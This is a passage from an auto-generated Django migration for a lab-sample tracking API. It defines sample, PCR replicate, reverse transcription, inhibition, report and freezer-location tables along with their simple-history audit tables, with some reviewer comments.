('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractions', to='liliapi.Sample')),
],
options={
'db_table': 'lili_sampleextraction',
'ordering': ['sample', 'id'],
'unique_together': {('sample', 'extraction_batch')},
},
),
# Audit-trail table for the Sample<->AnalysisBatch join rows.
migrations.CreateModel(
name='SampleAnalysisBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('analysis_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical sample analysis batch',
'db_table': 'lili_sampleanalysisbatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live explicit M2M "through" table linking Sample and AnalysisBatch; unique per
# (sample, analysis_batch) pair, CASCADE on both endpoints.
migrations.CreateModel(
name='SampleAnalysisBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('analysis_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleanalysisbatch_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleanalysisbatch_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.Sample')),
],
options={
'verbose_name_plural': 'sampleanalysisbatches',
'db_table': 'lili_sampleanalysisbatch',
'unique_together': {('sample', 'analysis_batch')},
},
),
# Deferred relational fields for the Sample model, added after the related models
# exist (makeigrations splits these out — presumably to resolve circular
# model-creation ordering; TODO confirm Sample's CreateModel appears earlier in
# this migration).
migrations.AddField(
model_name='sample',
name='analysisbatches',
field=models.ManyToManyField(related_name='samples', through='liliapi.SampleAnalysisBatch', to='liliapi.AnalysisBatch'),
),
migrations.AddField(
model_name='sample',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sample_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='sample',
name='filter_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.FilterType'),
),
migrations.AddField(
model_name='sample',
name='matrix',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.Matrix'),
),
migrations.AddField(
model_name='sample',
name='meter_reading_unit',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplesmeterunits', to='liliapi.Unit'),
),
migrations.AddField(
model_name='sample',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sample_modifier', to=settings.AUTH_USER_MODEL),
),
# Self-referential FK; deleting the referenced sample cascades to dependents.
migrations.AddField(
model_name='sample',
name='peg_neg',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='samples', to='liliapi.Sample'),
),
migrations.AddField(
model_name='sample',
name='record_type',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.PROTECT, to='liliapi.RecordType'),
),
migrations.AddField(
model_name='sample',
name='sample_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.SampleType'),
),
migrations.AddField(
model_name='sample',
name='samplegroups',
field=models.ManyToManyField(related_name='samples', through='liliapi.SampleSampleGroup', to='liliapi.SampleGroup'),
),
migrations.AddField(
model_name='sample',
name='study',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.Study'),
),
migrations.AddField(
model_name='sample',
name='total_volume_sampled_unit_initial',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplestvsunits', to='liliapi.Unit'),
),
# Audit-trail table for ReverseTranscription, including RT volumes and the
# external-positive RNA control Cq/validity flags.
migrations.CreateModel(
name='ReverseTranscriptionHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
# NOTE(review): float literal 8.6 as a DecimalField default — Django convention
# is Decimal('8.6'); harmless here since this is a frozen, already-applied migration.
('template_volume', models.DecimalField(decimal_places=10, default=8.6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('reaction_volume', models.DecimalField(decimal_places=10, default=50, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('rt_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('re_rt_notes', models.TextField(blank=True)),
('ext_pos_rna_rt_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_rna_rt_invalid', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
# Self-referential snapshot FK to the re-run ReverseTranscription, if any.
('re_rt', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ReverseTranscription')),
],
options={
'verbose_name': 'historical reverse transcription',
'db_table': 'lili_reversetranscriptionhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Audit-trail table for ReportType (django-simple-history).
migrations.CreateModel(
name='ReportTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical report type',
'db_table': 'lili_reporttypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live ReportType lookup table (unique name only).
migrations.CreateModel(
name='ReportType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reporttype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reporttype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_reporttype',
},
),
migrations.CreateModel(
name='ReportFileHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('file', models.TextField(max_length=100, null=True)),
('fail_reason', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('report_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ReportType')),
('status', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Status')),
],
options={
'verbose_name': 'historical report file',
'db_table': 'lili_reportfilehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ReportFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('file', models.FileField(null=True, upload_to=liliapi.models.ReportFile.reportfile_location)),
('fail_reason', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reportfile_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reportfile_modifier', to=settings.AUTH_USER_MODEL)),
('report_type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='reportfiles', to='liliapi.ReportType')),
('status', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='reportfiles', to='liliapi.Status')),
],
options={
'db_table': 'lili_reportfile',
'ordering': ['-id'],
},
),
# History table for RecordType (simple lookup: name + audit columns).
migrations.CreateModel(
name='RecordTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical record type',
'db_table': 'lili_recordtypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# History table for PCRReplicate. Custom decimal field classes from
# liliapi.models enforce non-negative values; replicate_concentration instead
# uses MinValueValidator(1E-100), i.e. it must be strictly positive.
migrations.CreateModel(
name='PCRReplicateHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('replicate_concentration', models.DecimalField(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('invalid', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('concentration_unit', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('invalid_override', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('pcrreplicate_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.PCRReplicateBatch')),
('sample_extraction', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.SampleExtraction')),
],
options={
'verbose_name': 'historical pcr replicate',
'db_table': 'lili_pcrreplicatehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# History table for PCRReplicateBatch: snapshots the per-control
# (ext_neg / rt_neg / pcr_neg / pcr_pos) cq/gc/invalid triples. All *_invalid
# flags default to True, i.e. a control is invalid until marked otherwise.
migrations.CreateModel(
name='PCRReplicateBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('replicate_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('notes', models.TextField(blank=True)),
('ext_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_invalid', models.BooleanField(default=True)),
('rt_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_invalid', models.BooleanField(default=True)),
('pcr_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_invalid', models.BooleanField(default=True)),
('pcr_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_invalid', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('re_pcr', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.PCRReplicateBatch')),
('target', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Target')),
],
options={
'verbose_name': 'historical pcr replicate batch',
'db_table': 'lili_pcrreplicatebatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Deferred FK: PCRReplicateBatch.target is added after both models exist to
# break the circular creation-order dependency.
migrations.AddField(
model_name='pcrreplicatebatch',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicatebatches', to='liliapi.Target'),
),
# History table for OtherAnalysis (free-text description/data snapshots).
migrations.CreateModel(
name='OtherAnalysisHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('description', models.TextField(blank=True)),
('data', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical other analysis',
'db_table': 'lili_otheranalysishistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live OtherAnalysis table; note the explicit plural 'otheranalyses'.
migrations.CreateModel(
name='OtherAnalysis',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('description', models.TextField(blank=True)),
('data', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='otheranalysis_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='otheranalysis_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'otheranalyses',
'db_table': 'lili_otheranalysis',
},
),
# History table for the NucleicAcidType lookup.
migrations.CreateModel(
name='NucleicAcidTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical nucleic acid type',
'db_table': 'lili_nucleicacidtypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# History table for the Matrix lookup (name + code).
migrations.CreateModel(
name='MatrixHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('code', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical matrix',
'db_table': 'lili_matrixhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# History table for Inhibition. nucleic_acid_type defaults to pk=1 —
# presumably a seeded default row; confirm against the data fixtures.
migrations.CreateModel(
name='InhibitionHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('inhibition_date', models.DateField(db_index=True, default=datetime.date.today)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('dilution_factor', models.IntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('nucleic_acid_type', models.ForeignKey(blank=True, db_constraint=False, default=1, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.NucleicAcidType')),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical inhibition',
'db_table': 'lili_inhibitionhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Deferred FKs on the live Inhibition model (added after the referenced
# models exist). Deleting a Sample cascades to its inhibitions, while the
# nucleic acid type lookup is PROTECTed.
migrations.AddField(
model_name='inhibition',
name='nucleic_acid_type',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.PROTECT, to='liliapi.NucleicAcidType'),
),
migrations.AddField(
model_name='inhibition',
name='sample',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inhibitions', to='liliapi.Sample'),
),
# History table for FreezerLocation (rack/box/row/spot coordinates).
migrations.CreateModel(
name='FreezerLocationHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('rack', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('box', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('row', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spot', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('freezer', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Freezer')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical freezer location',
'db_table': 'lili_freezerlocationhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live FreezerLocation table: the (freezer, rack, box, row, spot) tuple is
# unique, so each physical slot maps to at most one row.
migrations.CreateModel(
name='FreezerLocation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('rack', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('box', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('row', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spot', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezerlocation_creator', to=settings.AUTH_USER_MODEL)),
('freezer', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='freezerlocations', to='liliapi.Freezer')),
